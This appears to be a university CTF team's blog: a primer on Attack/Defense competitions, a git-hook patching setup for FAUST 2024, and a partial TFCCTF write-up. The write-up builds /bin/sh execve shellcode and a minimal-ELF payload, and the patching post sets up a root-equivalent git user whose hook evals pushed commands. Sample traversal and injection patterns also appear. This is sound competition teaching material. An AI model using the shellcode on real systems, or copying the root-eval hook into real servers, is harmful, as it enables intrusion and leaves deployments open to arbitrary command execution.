CTF @ UBC

A primer on Attack Defense CTFs

2025-09-23T00:00:00+00:00

Introduction and Target Audience

Hi! If you’re reading this, it means you’re at least a little curious about Attack/Defense CTFs.

This guide assumes that you are familiar with:

the concept of Capture The Flag competitions (at least Jeopardy CTFs)
what a flag looks like and how to find one.

If you’re still here, strap in tight while we explore what the heck an Attack Defense CTF is.

Flavours of CTFs

CTFs come in many flavours. The most common is Jeopardy, followed by Attack-Defense, and on rare occasions HackQuests (shoutout to Hackceler8!). Each of these competition types requires a different set of cybersecurity skills.

Jeopardy: This is the most common type of CTF. Players pick from a list of challenges in different categories (Web, Crypto, Pwn, Rev, Misc). These challenges are hosted on a central server. Teams earn points by attacking a challenge on the server and retrieving its flag. The competitions generally run for 24 to 48 hours and don’t require active involvement throughout. Famous Jeopardy CTFs include CSAW CTF, Plaid CTF, and Maple CTF :)
Attack-Defense: The original CTF type. Each team is assigned a server in a shared network. Each server starts by hosting the same set of vulnerable services. Each round, or tick (1-5 minutes long), teams gain points by attacking the services hosted on other teams’ servers to retrieve flags, and by defending their own services against attacks, patching out vulnerabilities without breaking core functionality. The team with the most points after X ticks wins! These competitions last around 6 to 10 hours and often require active player involvement. Popular A/D CTFs include DEF CON CTF, ENOWARS, and FAUST CTF.
HackQuests: This is just an example to demonstrate that CTFs don’t always fit in the above categories. A popular HackQuest is Hackceler8 (Google CTF Finals). In this competition, players are incentivized to find glitches in custom (retro) video games in order to achieve the fastest speedruns.

Attack-Defense CTFs

This is a more in-depth section that covers the specific details about Attack Defense (A/D) CTFs.

Game Duration & Ticks

An Attack-Defense CTF typically runs for about 8 hours. It is played in rounds of 1 to 5 minutes called ticks.

A game that starts at 14:00 with 5-minute ticks will look as follows:

+--------+----------------+
|  TICK  |     TIME       |
|--------+----------------|
|TICK 1  | 14:00 to 14:04 |
|--------+----------------|
|TICK 2  | 14:05 to 14:09 |
|--------+----------------|
|TICK 3  | 14:10 to 14:14 |
|--------+----------------|
|  ...   |      ...       |
+--------+----------------+
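The schedule above is plain arithmetic on the start time, and tooling often needs the current tick number to decide which flags are still fresh. Here is a minimal sketch; the function names and the example date are made up for illustration, and real gameservers usually report the current tick themselves.

```python
from datetime import datetime, timedelta

def tick_windows(start, tick_minutes, count):
    """Yield (tick_number, window_start, window_end) for the first `count` ticks."""
    tick = timedelta(minutes=tick_minutes)
    for n in range(count):
        begin = start + n * tick
        yield n + 1, begin, begin + tick

def current_tick(start, tick_minutes, now):
    """Return the 1-based number of the tick that `now` falls into."""
    return (now - start) // timedelta(minutes=tick_minutes) + 1

start = datetime(2025, 1, 1, 14, 0)  # hypothetical game start
for number, begin, end in tick_windows(start, 5, 3):
    # The table lists the last full minute of a tick, so step back one minute.
    last_minute = end - timedelta(minutes=1)
    print(f"TICK {number}: {begin:%H:%M} to {last_minute:%H:%M}")
```

With 5-minute ticks, a timestamp of 14:12 falls into tick 3.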

The Game Network & Your Vulnbox

When you register for an Attack-Defense competition, each team is assigned a server. This server is referred to as a Vulnbox. This “box” hosts a set of vulnerable services that your team attempts to defend.

The core of an A/D CTF is the Game Network: the computer network that connects all the team boxes to each other. It lets you access the services on other teams’ boxes and lets other teams access the services on yours. Aside from vulnboxes, it also hosts a central gameserver.

The method used to host services varies from CTF to CTF. It can range from using docker compose for each service to having a VM for each service.

(TODO: add photo of game network and examples of CTFs with docker compose)

VPNs, vulnbox setup and whatnot

To connect your vulnbox to the game network and access game resources like the flag submitter or an internal scoreboard, competitions provide a VPN configuration, for example as a WireGuard configuration. Teams can use it to submit flags from their local machines, or even to attack other teams from their local machines to save compute resources on the vulnbox.

Vulnbox setup differs between competitions. Some, like ENOWARS, have historically provided teams with a virtual machine as their vulnbox with minimal setup required; others, like FAUST CTF, expect you to provide your own machine, connect it to the game network, and apply a VM image to set up your vulnbox.

Services

A service in an A/D CTF is a computer program/application that contains one or more vulnerabilities. A service can be considered the A/D analogue of a challenge in a Jeopardy CTF.

Similar to challenges in a Jeopardy CTF, services can fall into one or more categories such as Web, Crypto, Pwn, Rev, etc. They may come with source code, or with only a binary executable for your team to reverse and exploit.

Here are a few examples of services:

piratesay: From ENOWARS 8, this service mimics a pirate-themed dark web forum where users can chat and brag about exploits. The service falls into the pwn category and only provides a binary executable.
nautro: From DEF CON 33 CTF, a Balatro-like resource management card game where players attempt to maximize their resources by playing cards. This service falls into the miscellaneous category and only provides a binary executable.
quickr-maps: From FAUST CTF 2024, a location sharing application with an API. This falls into the Web category, and it comes with the Go/Python source code.

Note: The services above all use the Attack-Defense format. Services can also use the “King of The Hill” format for scoring.

King of The Hill (KotH)

TODO at a later date.

No attack or defense involved. Services revolve around scoring more points than the other teams. It’s typically only seen in smaller A/D competitions like DEF CON CTF (12 teams).

Scoring Points

There are 3 ways to score points in an A/D CTF. Each competition weights these components differently.

For each tick, you can win points from:

Attack Points: Points you gain from exploiting another team’s service and submitting their flag. The more teams you exploit, the more points you gain.
Defense Points: Points you gain if no other team (fully) exploits your service. One service might have multiple flags.
SLA Points: Points you gain by having an active and reachable service which passes a set of tests from the gameserver.

At any given tick, each of your services might be in one of the following states (varies between CTFs):

OK: Everything working fine
DOWN: Service not running or another error in the network connection, e.g. a timeout or connection abort
FAULTY: Service is available, but not behaving as expected (fails SLA)
FLAG_NOT_FOUND: Service is behaving as expected, but a flag could not be retrieved
RECOVERING: Service is behaving as expected, at least one flag could be retrieved, but one or more from previous ticks could not.

(adapted from https://ctf-gameserver.org/checkers/#check-results)

The Gameserver

The gameserver is a machine/set of machines in the game network that plays a variety of roles.

It is responsible for:

Placing flags in your services every tick
Running tests against each service every tick. (SLA)
Flag submission
Providing additional information about services if required.
Anonymizing web traffic (sometimes)

Attacking Services, Attack Info and Flag stores

Attacking a service is similar to exploiting a challenge in a Jeopardy CTF. The general workflow is to find a vulnerability and exploit it to retrieve the flag.

Services typically contain multiple flags; the location of each flag is often referred to as a flag store. An example of a flag store in piratesay from earlier would be the secrets file associated with each user account on the web forum. The same service also has another flag store in the form of .treasure files, which are password-protected.

It isn’t always obvious where the flag stores are. However, examining the source code or reverse engineering the service is helpful. More on this in the later sections.

Attack Info is a special and very important API endpoint on the gameserver that provides useful information about the flag stores for each Team’s service for the last few ticks. This can be in the form of user IDs, file paths, and more.

Attack Info is typically presented as a large JSON document with roughly the following schema (varies from CTF to CTF):

{
    "team1": {
        "tick n": {
            "flagstore 1": ["data"],
            "flagstore 2": ["more", "data"]
        },
        "tick n-1": {
            "flagstore 1": ["otherdata"],
            "flagstore 2": ["dead", "beef"]
        },
        "tick n-2": {
            "flagstore 1": ["data"],
            "flagstore 2": ["deadbeef", "face"]
        }
    },
    "team2": { ... },
    "team3": { ... },
    ...
}

Here is a real example of the attack info from [ENOWARS 9 - timetype] which displayed the Attack Info for the last 10 ticks.

{
...
 "10.1.26.1": {
        "205": {
          "1": [
            "hlU9y0DChKvoaWz"
          ],
          "2": [
            "PBPXITUPPU"
          ]
        },
        "206": {
          "1": [
            "4PZafbjfHLguKBX"
          ],
          "2": [
            "A460UZVSHR"
          ]
        },
        "207": {
          "1": [
            "VbaVyFL82Gi"
          ],
          "2": [
            "6KTHS66AUK"
          ]
        },
        "208": {
          "1": [
            "CsYkxqsbmu0"
          ],
          "2": [
            "PKFTDKIFPR"
          ]
        },
        "209": {
          "1": [
            "jOE2Vs2H"
          ],
          "2": [
            "59ZZEVTEK6"
          ]
        },
        "210": {
          "1": [
            "mPC5pP9JOEmb5W"
          ],
          "2": [
            "XUVI2O4HQO"
          ]
        },
        "211": {
          "1": [
            "umbqwFv4VkOw"
          ]
        },
        "212": {
          "1": [
            "6fHMlCfIbmZ1HG"
          ],
          "2": [
            "M9LGS3ZSEB"
          ]
        },
        "213": {
          "1": [
            "GBtSMPAv"
          ],
          "2": [
            "8U57UI01UA"
          ]
        },
        "214": {
          "1": [
            "H8Tu4MelKHHU9"
          ],
          "2": [
            "5JXUWCCXW7"
          ]
        }
      },
...
}

Note: some A/D CTFs do not have Attack Info endpoints.

If a CTF does have this endpoint, it’s ALWAYS a good idea to check it for useful information that helps you understand and exploit a challenge.
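To make the nesting concrete, here is a minimal sketch that walks attack info shaped like the ENOWARS example (team address, then tick, then flag store, then a list of hints). The helper name iter_attack_info and the max_age parameter are made up for illustration, and the layout is an assumption that will differ between CTFs.

```python
import json

def iter_attack_info(attack_info, team, max_age=None):
    """Yield (tick, flagstore, hint) tuples for one team, newest tick first."""
    ticks = attack_info.get(team, {})
    # Assumes tick keys are integer strings, as in the example above.
    newest_first = sorted(ticks, key=int, reverse=True)
    if max_age is not None:
        newest_first = newest_first[:max_age]  # skip ticks whose flags expired
    for tick in newest_first:
        for flagstore, hints in ticks[tick].items():
            for hint in hints:
                yield int(tick), flagstore, hint

sample = json.loads("""
{
  "10.1.26.1": {
    "213": {"1": ["GBtSMPAv"], "2": ["8U57UI01UA"]},
    "214": {"1": ["H8Tu4MelKHHU9"], "2": ["5JXUWCCXW7"]}
  }
}
""")

for tick, flagstore, hint in iter_attack_info(sample, "10.1.26.1"):
    print(tick, flagstore, hint)
```

An exploit would then use each hint (a username, a file name, and so on) to know where to look on that team's service for that tick.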

Finally, it’s important to make sure that your exploits can run fast enough to retrieve the flag before it expires. Flags expire after X ticks. (X is set by the A/D CTF).

Defending Services and Patching

So, you found a vulnerability in your service. Now what? Well, you get to patch it.

Depending on the service and the game setup, which varies from CTF to CTF, patching ranges from trivial to annoyingly tedious.

If patching source code: If your patch involves modifying source code written in Python/Go/Java/etc, it’s simply a matter of changing the code, recompiling the program if necessary and restarting the service (via docker compose or VMs).

If patching a binary (binpatching): If your patch needs to be applied to a binary executable, you would need to use a utility like pwntools patching or patchelf to patch the bytes/assembly code.

Note that when you “push” your patch to your service, you might have to take it down for a tick, losing out on sweet sweet SLA points. Even if your service “recovers”, you might still end up failing the SLA.

The Service Level Agreement (SLA)

At this point, you might wonder why you cannot patch your service by disabling access to all features. The issue is that you would fail the SLA.

As mentioned earlier, the Service Level Agreement (SLA) is a set of tests that the gameserver runs against your services every tick. These tests are intended to ensure that your service still maintains its core features. A messaging app should be able to send/receive messages, a card game should let you play cards, and so on.

If your services pass these tests, your team receives points for having a functional service. If your services fail these tests, your team receives neither SLA points nor defense points.

The Secret Other Thing: Network Traffic Analysis

A team’s biggest asset in Attack/Defense CTFs is the network traffic it receives from other teams.

Each tick, your team is able to capture the packets sent to it in the form of PCAPs.

Analyzing the payloads that other teams send to your service is extremely insightful. This data can help you find vulnerabilities in your services by showing you where to look in the service’s code. This information can also help you learn more about the service as well as help you write exploits to attack other teams. PCAPs can also be useful to identify how other teams might be stepping around your patches to services.

Traffic analysis is an essential tool for succeeding at Attack-Defense CTFs. Teams often have extensive infrastructure dedicated to capturing and analyzing packets.

Flag submission

Once you’ve captured some flags (haha), you need to submit them to receive points for the tick. It’s generally as simple as sending newline-separated flags to a port at the submission URL.

More details can be found here. It does a much better job at explaining the internals of flag submitters if you’re interested.
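As a rough illustration of the newline-separated protocol, the sketch below builds the payload and sends it over a plain TCP socket. The FLAG{...} format, the host and the port are placeholders, and real submission services differ in how they reply (often one status line per flag), so treat this as a starting point rather than a drop-in submitter.

```python
import socket

def build_submission(flags):
    """Deduplicate flags (keeping order) and join them one per line."""
    unique = list(dict.fromkeys(f.strip() for f in flags if f.strip()))
    return "".join(f + "\n" for f in unique).encode()

def submit_flags(flags, host, port, timeout=5.0):
    """Send flags to the submission service and return its raw reply."""
    payload = build_submission(flags)
    with socket.create_connection((host, port), timeout=timeout) as conn:
        conn.sendall(payload)
        conn.shutdown(socket.SHUT_WR)  # signal that no more flags are coming
        chunks = []
        while chunk := conn.recv(4096):
            chunks.append(chunk)
    return b"".join(chunks).decode(errors="replace")

# Made-up flags, just to show the wire format.
print(build_submission(["FLAG{a}", "FLAG{b}", "FLAG{a}"]))
```

Deduplicating before sending is a small courtesy to the gameserver; some competitions rate-limit or penalize repeated submissions.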

AD Infrastructure

To succeed in an Attack-Defense CTF, you must have infrastructure/tooling to automate or avoid repetitive tasks. The infrastructure can range from a simple bash script that helps you submit flags to a bespoke application built from the ground up to efficiently analyze PCAPs.

Having access to tooling during the competition enables your team to focus more of their precious resources on looking at services rather than remembering to run an exploit script every tick.

Infrastructure can define the difference between winning and losing a game. Naturally, many teams are secretive about the tools/infrastructure that they use.

Let’s go through a few common tools many teams would use:

Throwers

A thrower is a tool that runs your exploit script against all the other boxes on the network and submits received flags for you. It’s a great abstraction that takes care of:

Running exploits against each team
Using the team-specific and tick-specific information about a service (attack info)
Submitting flags

A thrower might take the form of an exploit template that members can write and throw exploits with.

A popular “off-the-shelf” thrower is ataka
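The core loop of a thrower is small. The sketch below runs one exploit function against every target in parallel, pulls anything flag-shaped out of its output, and keeps going when a target fails. Everything here (the throw and demo_exploit names, the FLAG{...} regex, the target addresses) is hypothetical and is not how ataka or any particular tool works.

```python
import re
from concurrent.futures import ThreadPoolExecutor

FLAG_RE = re.compile(r"FLAG\{[A-Za-z0-9_]+\}")  # hypothetical flag format

def throw(exploit, targets, attack_info, workers=8):
    """Run `exploit(target, hints)` against every target and collect flags."""
    def run_one(target):
        try:
            output = exploit(target, attack_info.get(target, {}))
        except Exception as error:  # one broken target must not stop the round
            return target, set(), error
        return target, set(FLAG_RE.findall(output)), None

    with ThreadPoolExecutor(max_workers=workers) as pool:
        return list(pool.map(run_one, targets))

def demo_exploit(target, hints):
    """Stand-in exploit: a real one would talk to the service on `target`."""
    if target == "10.1.3.1":
        raise ConnectionError("service down")
    return f"welcome back! secret=FLAG{{{target.replace('.', '_')}}}"

for target, flags, error in throw(demo_exploit, ["10.1.2.1", "10.1.3.1"], {}):
    print(target, sorted(flags), error)
```

A real thrower would run this once per tick and hand the collected flags to the submitter.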

PCAP Analyzers

A PCAP Analyzer is an application that is used to tag, view, filter, and analyze Packet Capture data uploaded to it. These tools often have UIs where you are able to filter for and tag certain patterns in a packet such as path_traversal when you see a pattern of ../../../. By filtering through and monitoring data sent to services, you can gain a clearer understanding of how services work and how to approach exploiting/patching them.

There are plenty of popular “off-the-shelf” PCAP analyzers. The most commonly used tool is Tulip.
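Tagging boils down to running a set of patterns over each captured payload. Here is a minimal sketch of that idea; the rule names and regexes are made up for illustration and are far cruder than what a tool like Tulip offers.

```python
import re

# Hypothetical tag rules: name -> pattern that hints at that kind of traffic.
TAG_RULES = {
    "path_traversal": re.compile(rb"(\.\./){2,}"),
    "flag_out": re.compile(rb"FLAG\{[^}]+\}"),  # made-up flag format
    "sql_injection": re.compile(rb"(?i)union\s+select|'\s*or\s+1=1"),
}

def tag_payload(payload):
    """Return the sorted names of every rule that matches the payload."""
    return sorted(name for name, rule in TAG_RULES.items() if rule.search(payload))

print(tag_payload(b"GET /download?file=../../../etc/passwd HTTP/1.1"))
```

A rule that matches your own flag format in outgoing traffic is especially useful: it points straight at the connections where someone successfully stole a flag.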

Patcher

A Patcher is a nice-to-have tool for reliably patching services during the competition without needing to SSH into the vulnbox each time.

There are many solutions to patching. One such solution is to use git. You can read more about this in our previous writeup Patching infrastructure for attack-defense CTFs.

Anything you find useful :D

Yeah. What the title says. Tooling is an iterative process. As you compete in more CTFs, you find more use cases and functionality that existing tools are missing.

It’s a very exciting experience to build your own tooling from scratch that’s custom built for a CTF. Maybe you feel like you’re basically a copy-pasting machine between your code editor and ChatGPT; try writing a tool to automate triage with LLMs! There is infinite potential for new tools you never knew you needed :D

An Important Conclusion

Overwhelmed? It’s a lot of information to process in a single page. The best way to learn is to participate in competitions and learn as you go. The most exciting part is failing, iterating and improving over the years.

Each step towards improving your team’s processes, communication, service allocation strategy, and tooling is a step towards growth. Remember that the most important rule in CTFing is to have fun <3

Resources

https://glitchrange.com/attack-defense: A quick overview of A/D CTFs.
https://2025.faustctf.net/information/attackdefense-for-beginners/: Rules and the setup of a real Attack Defense CTF
https://ctf-gameserver.org/: An excellent resource going over organizing Attack Defense CTFs

[FAUST 2024] Patching infrastructure for attack-defense CTFs

2024-09-30T00:00:00+00:00

This is a writeup of the patching setup Maple Bacon used in FAUST 2024.

This last weekend, we played in FAUST CTF 2024. While we were limited on manpower & had to scramble about with challenges, it was still quite a lot of fun.

FAUST provided eight challenges:

floppcraft: xxe + ssrf + fixed jwt signing
quickr-maps: url injection + ssrf, flags plotted as QR codes
secretchannel: bit flipping token id
todo-list: user id collision
lvm: type confusion pwn
asm-chat: insecure session handling
missions: cache shenanigans
vault: hardcoded rsa n

Out of those, no one was able to exploit one (lvm), and only a handful of teams had an exploit for another (missions). We had working exploits for three: floppcraft, todo-list, and asm_chat, and had a nearly-working exploit for quickr-maps. We were able to patch floppcraft and asm_chat entirely, and partially patch quickr-maps, todo-list-service, and vault. We placed 27th, but peaked at 20th (when our exploits were all mostly working). Overall pretty alright! Not our best performance, but it was the first time we had played in an A/D CTF in a while.

I handled defense + patching + network analysis infrastructure. We used an entirely new system for patching that worked quite well (despite putting it together a week before the competition) - so I figured I’d write up a little something on it.

Design

In previous years, we’ve managed patching by SSHing into the box and manually editing the appropriate files + rebuilding. This sucks, for everyone involved - and if patches are more than a couple of lines long, it really sucks. We’ve used Git for ease of rollback / version history, but only to track services on the box itself. This got me thinking: could we just… set up a Git server on the box and push patches directly to it? We would need some way to treat a normal repo as an origin, though. And the Git server expects its origin repositories to be “bare”. So that wouldn’t work directly.

Or would it? As it turns out, the “bare” requirement is just a configuration option and can be disabled. Treating an ordinary Git repository as an origin repo has several issues to watch out for, however: every file must be owned by the git user and you cannot have working/staged changes in the origin repository. But that’s it. Otherwise, it works fine. Ownership issues can be circumvented by treating the git user as root: not the best security practice, for sure, but fine for a team-internal server. This will let authorized users clone services with git clone git@:/srv/, develop patches locally, and push their changes with git push.

Typically, services will need to be rebuilt for changes to be applied. While this is a nicer design for pushing patches, deploying those patches still means SSHing into the box, navigating to the challenge, and running docker-compose up -d --build or similar. Can this process be made any more streamlined?

As it turns out - Git has a rich hooks system that we can adapt for our purposes. These hooks can run at various points in the Git workflow - but the two we’re interested in are pre-receive and post-receive, as they are the only hooks that can take user-specified parameters (with the --push-option flag). The pre-receive hook runs immediately upon receiving a git push. The post-receive hook runs immediately after all new references are processed, and only if a reference was updated as a result. This isn’t perfect - it would be convenient if we could run the hook regardless of push success, so that in case a deploy fails at first we can retry without pushing another commit - but it will suffice.

Creating a custom post-receive hook is straightforward. The Git documentation provides an example hook, which we can modify to serve our purposes:

#!/bin/sh
#
# A hook script to execute arbitrary code from push options.
# This script will run when a new push is successful and the
# --push-option flag has been used at least once.
# It will execute the commands in the push-option in sequence.

if test -n "$GIT_PUSH_OPTION_COUNT"
then
    i=0
    while test "$i" -lt "$GIT_PUSH_OPTION_COUNT"
    do # this is exceptionally ugly but needed for indirect variables
        eval "action=\$GIT_PUSH_OPTION_$i"
        echo "$action"
        eval "$action"
        i=$((i + 1))
    done
fi

This hook must be placed in .git/hooks/post-receive, and be made executable. If desired, hooks can be installed globally by setting the global core.hooksPath configuration option. This is convenient for our purposes. Now, arbitrary build commands can be executed after a (successful) push with e.g. git push --push-option="docker-compose up -d --build"
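Hooks can be any executable, so the way Git hands push options to the hook is easy to see from another language too. The sketch below only reads the GIT_PUSH_OPTION_COUNT and GIT_PUSH_OPTION_<n> environment variables that the shell hook above relies on and prints what it would run; the read_push_options helper and the fake environment are made up for illustration.

```python
import os

def read_push_options(environ=os.environ):
    """Return the push options Git exposes to pre-/post-receive hooks."""
    count = int(environ.get("GIT_PUSH_OPTION_COUNT") or 0)
    return [environ[f"GIT_PUSH_OPTION_{i}"] for i in range(count)]

# Simulates: git push -o "docker-compose down" -o "docker-compose up -d --build"
fake_env = {
    "GIT_PUSH_OPTION_COUNT": "2",
    "GIT_PUSH_OPTION_0": "docker-compose down",
    "GIT_PUSH_OPTION_1": "docker-compose up -d --build",
}
for command in read_push_options(fake_env):
    print("would run:", command)
```

Because every option is executed verbatim as root, anyone whose key is in authorized_keys effectively has a root shell on the vulnbox, which is acceptable only because the server is team-internal.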

Configuration

With fairly minimal configuration, we can get this all set up:

Create a new user git w/ the same UID/GID as root and w/ git-shell as their login shell (useradd leaves the password disabled by default):

useradd -ou 0 -g 0 --system --create-home --shell /usr/bin/git-shell git

Generate SSH keys for the git user:

ssh-keygen -t ed25519 -N '' -f /home/git/.ssh/id_ed25519

Install authorized_keys, disable password authentication, install post-receive hooks, etc:

mv authorized_keys /home/git/.ssh/authorized_keys && chmod 640 /home/git/.ssh/authorized_keys
echo "PasswordAuthentication no" >> /etc/ssh/sshd_config
mv post-receive /home/git/hooks/post-receive && chmod 755 /home/git/hooks/post-receive

Be sure to run systemctl restart sshd after making these changes.

The following settings must be made for the git user:

git config --global receive.denyCurrentBranch updateInstead
git config --global receive.advertisePushOptions true
git config --global core.hooksPath /home/git/hooks/

These settings allow pushing to non-bare repos, allow the use of --push-option, and allow the installation of global commit hooks. The following settings are also recommended:

git config --global user.name "vulnbox"
git config --global user.email "vulnbox@example.com"
git config --global init.defaultBranch main

Now, upon the release of services, check them into Git. If there is any mutable data, remove it from Git tracking to avoid unstaged data issues.

git init && git stage . && git commit -m "initial commit"
git rm -r --cached data/ && git commit -m "do not track mutable data"

And that’s all you need. The SSH server will handle anyone connecting to the box via Git, and plumb them into git-shell so that cloning/pulling/pushing works.

If you encounter errors of the form ! [remote rejected], ensure that there are no uncommitted changes in any service. Be sure to remove mutable state from Git tracking to prevent this.

Hopefully this writeup is helpful to any teams new to the attack-defense format. If you find it useful, or have come up with any improvements that have worked for your team - let us know! We’re contactable over Mastodon, Twitter, and email.

[TFCCTF 2024] Santa’s Little Helper

2024-08-05T00:00:00+00:00

Ayyy misc pwn.

Challenge

Santa doesn’t have a lot of room left in his sleigh. Help him fit one more item

The binary is provided; decompiling it with Ghidra gives:

undefined8 main(void)

{
    int iVar1;
    long in_FS_OFFSET;
    int local_ac;
    char *local_a0;
    char *local_98;
    undefined8 local_90;
    char local_88 [120];
    long local_10;
    
    local_10 = *(long *)(in_FS_OFFSET + 0x28);
    read(0,local_88,0x78);
    local_90 = 0x10102464c457f;
    for (local_ac = 0; local_ac < 8; local_ac = local_ac + 1) {
        if (local_88[(long)local_ac + -8] != local_88[local_ac]) {
        write(1,"Not an ELF file\n",0x10);
                        /* WARNING: Subroutine does not return */
        exit(1);
        }
    }
    iVar1 = memfd_create("program",0);
    if (iVar1 == -1) {
        write(1,"Failed to create memfd\n",0x17);
                        /* WARNING: Subroutine does not return */
        exit(1);
    }
    write(iVar1,local_88,0x78);
    local_a0 = (char *)0x0;
    local_98 = (char *)0x0;
    iVar1 = fexecve(iVar1,&local_a0,&local_98);
    if (iVar1 == -1) {
        write(1,"Failed to execute\n",0x12);
                        /* WARNING: Subroutine does not return */
        exit(1);
    }
    if (local_10 != *(long *)(in_FS_OFFSET + 0x28)) {
                        /* WARNING: Subroutine does not return */
        __stack_chk_fail();
    }
    return 0;
}

Looks fairly straightforward – essentially, it reads up to 120 bytes of input (as an ELF file), checks that it starts with 7f 45 4c 46 02 01 01 00 (confirmed with some dynamic debugging on the for loop), writes the input into an anonymous file created by memfd_create, and executes that file. If the file does something like execve("/bin/sh", -, -), we get a shell. Simple.

First Attempt: compiling C

Since we need a 64ELF (for the header constraint), as a first attempt I tried to compile bare assembly within a C program:

int main() {
    __asm__ (
        "movq $0x0068732f6e69622f, %%rbx\n\t" // '/bin/sh\x00'
        "push %%rbx\n\t"
        "movq %%rsp, %%rdi\n\t" // rdi points to '/bin/sh', rsi and rdx don't really matter for /bin/sh
        "movl $0x3b, %%eax\n\t" // rax = 0x3b for execve
        "syscall\n\t"
        :
        :
        : "rdi", "rbx", "eax"
    );
}

However, the resulting ELF is 15KB (more than 100x the size of the acceptable input). Even with some optimization, its size is not even close to 120 bytes. So this is definitely not the way – the problem with compiling a C program to an ELF is that the compiler includes too many unnecessary parts such as .plt, .init, .bss. We don’t need any of those – we just need it to jump to the shellcode and execute it. This raises the question – what is the bare minimum for a 64ELF?

The smallest ELFs?

This GitHub repo shows some interesting ELFs. golfed.polymorphic.execve.x86 is a 76-byte ELF that gets a shell, but its first eight bytes do not match the restriction of this challenge. base.bin is a 64ELF that starts with 7f 45 4c 46 02 01 01 00 and is 128 bytes. In particular, it contains only the ELF header, the program header, and three x86 instructions. So presumably, the ELF header and the program header are the bare minimum for a valid ELF. The problem is that the two headers together are already 120 bytes! So, without some tricks, we won’t be able to do anything. Before diving into those tricks, let’s take a look at the semantics of those headers.

A little detour to the 64ELF header and Program Header (Ph) table

The 64ELF header has a fixed size of 0x40 bytes:

typedef struct
{
  unsigned char	e_ident[EI_NIDENT];	/* Magic number and other info */
  Elf64_Half	e_type;			/* Object file type */
  Elf64_Half	e_machine;		/* Architecture */
  Elf64_Word	e_version;		/* Object file version */
  Elf64_Addr	e_entry;		/* Entry point virtual address */
  Elf64_Off	    e_phoff;		/* Program header table file offset */
  Elf64_Off	    e_shoff;		/* Section header table file offset */
  Elf64_Word	e_flags;		/* Processor-specific flags */
  Elf64_Half	e_ehsize;		/* ELF header size in bytes */
  Elf64_Half	e_phentsize;	/* Program header table entry size */
  Elf64_Half	e_phnum;		/* Program header table entry count */
  Elf64_Half	e_shentsize;	/* Section header table entry size */
  Elf64_Half	e_shnum;		/* Section header table entry count */
  Elf64_Half	e_shstrndx;		/* Section header string table index */
} Elf64_Ehdr;
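The field widths in the struct above add up to 0x40 (64) bytes, which is easy to double-check with Python's struct module. This is only a sketch for poking at headers: the format string assumes a little-endian 64-bit ELF, and the parse_ehdr helper is made up for illustration.

```python
import struct

# Little-endian layout of Elf64_Ehdr, field by field (no padding with "<").
EHDR_FORMAT = "<16sHHIQQQIHHHHHH"
EHDR_FIELDS = (
    "e_ident", "e_type", "e_machine", "e_version", "e_entry", "e_phoff",
    "e_shoff", "e_flags", "e_ehsize", "e_phentsize", "e_phnum",
    "e_shentsize", "e_shnum", "e_shstrndx",
)

def parse_ehdr(data):
    """Unpack the first 64 bytes of a 64-bit little-endian ELF into a dict."""
    values = struct.unpack_from(EHDR_FORMAT, data)
    return dict(zip(EHDR_FIELDS, values))

print(hex(struct.calcsize(EHDR_FORMAT)))
```

Calling parse_ehdr(open("base.bin", "rb").read()) would show fields such as e_phoff and e_phnum that the tricks later in this post modify.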

The first 0x10 bytes of an ELF file are its identifier – an ELF file always starts with the four magic bytes 7f 45 4c 46. The next 5 bytes indicate its fundamental properties such as endianness and the type of the ELF header (32ELF vs 64ELF). These are followed by 7 bytes of padding (for future extension, foreshadowing). The rest of the ELF header fields are described in the comments. Since the ELF header size is fixed, I tried to patch out the program header by setting e_phnum = 0. However, that resulted in

bash: ./base.bin: cannot execute binary file: Exec format error

Therefore, my conclusion is that an ELF must have a program header. So, I tried to shrink the size of the program header. In base.bin, e_phentsize = 0x38. I tried to change that value, but it also resulted in the above error. So, let’s take a look at the program header struct:

typedef struct
{
  Elf64_Word	p_type;			/* Segment type */
  Elf64_Word	p_flags;		/* Segment flags */
  Elf64_Off	    p_offset;		/* Segment file offset */
  Elf64_Addr	p_vaddr;		/* Segment virtual address */
  Elf64_Addr	p_paddr;		/* Segment physical address */
  Elf64_Xword	p_filesz;		/* Segment size in file */
  Elf64_Xword	p_memsz;		/* Segment size in memory */
  Elf64_Xword	p_align;		/* Segment alignment */
} Elf64_Phdr;

So, presumably, the program header has a fixed size.
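The same kind of size check works for the program header: its fields add up to 0x38 bytes, matching e_phentsize, and together with the ELF header that gives the 120 bytes mentioned earlier. The format strings below are a sketch assuming the little-endian 64-bit layouts shown in the two structs.

```python
import struct

EHDR_SIZE = struct.calcsize("<16sHHIQQQIHHHHHH")  # Elf64_Ehdr
PHDR_FORMAT = "<IIQQQQQQ"                           # Elf64_Phdr
PHDR_SIZE = struct.calcsize(PHDR_FORMAT)

print(hex(PHDR_SIZE), EHDR_SIZE + PHDR_SIZE)
```

So a file that stores both headers back to back has no room left for code within the 120-byte limit, which is why the overlays below are needed.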

Trick 1: Header overlay

As detailed here, if the end of the ELF header matches with the start of the program header, we can shift the start of the program header by changing the value of e_phoff (the offset of the program header from the start of the binary). Decompiling base.bin with Ghidra, we see:

Hmmm, doesn’t match exactly. But the 0x38th byte (e_phnum, the number of program headers; in this post, all indices are 0-indexed unless otherwise specified) is 0x01, which matches the first byte of the program header. To make the rest match, I patched the 0x3cth byte to be 0x05. That doesn’t cause any issues – the reason being e_shoff = 0, indicating there is no section header. Great, so the effective size of the program header is reduced by 8 bytes (the size of the overlay)!
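Here is a small sketch of why the overlay lines up byte for byte. The last four 2-byte fields of the ELF header (offsets 0x38 to 0x3f) are compared against the first two 4-byte fields of the program header. Reading the patched 0x05 as p_flags = PF_R | PF_X is my interpretation of the patch; the constant values themselves are the standard ELF ones.

```python
import struct

PT_LOAD = 1          # p_type of a loadable segment
PF_X, PF_R = 1, 4    # segment permission bits

# Tail of Elf64_Ehdr after the patch: e_phnum, e_shentsize, e_shnum, e_shstrndx.
ehdr_tail = struct.pack("<HHHH", 1, 0, PF_R | PF_X, 0)
# Head of Elf64_Phdr: p_type, p_flags.
phdr_head = struct.pack("<II", PT_LOAD, PF_R | PF_X)

print(ehdr_tail.hex(), phdr_head.hex())
```

Both byte strings come out identical, so setting e_phoff = 0x38 lets the loader read the same 8 bytes once as the end of the ELF header and once as the start of the program header.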

The shortest x86 shellcode?

So, the effective total size of the headers is reduced to 112 bytes. But we still need to place the actual shellcode into the ELF. Translating the above C code into x86:

mov rbx, 0x0068732f6e69622f
push rbx 
mov rdi, rsp 
mov eax, 0x3b
syscall

This gives a shell and is only 21 bytes which is fairly short but we can make it even shorter by replacing the second and third mov with push + pop:

mov rbx, 0x0068732f6e69622f
push rbx
push rsp
pop rdi
push 0x3b
pop rax
syscall

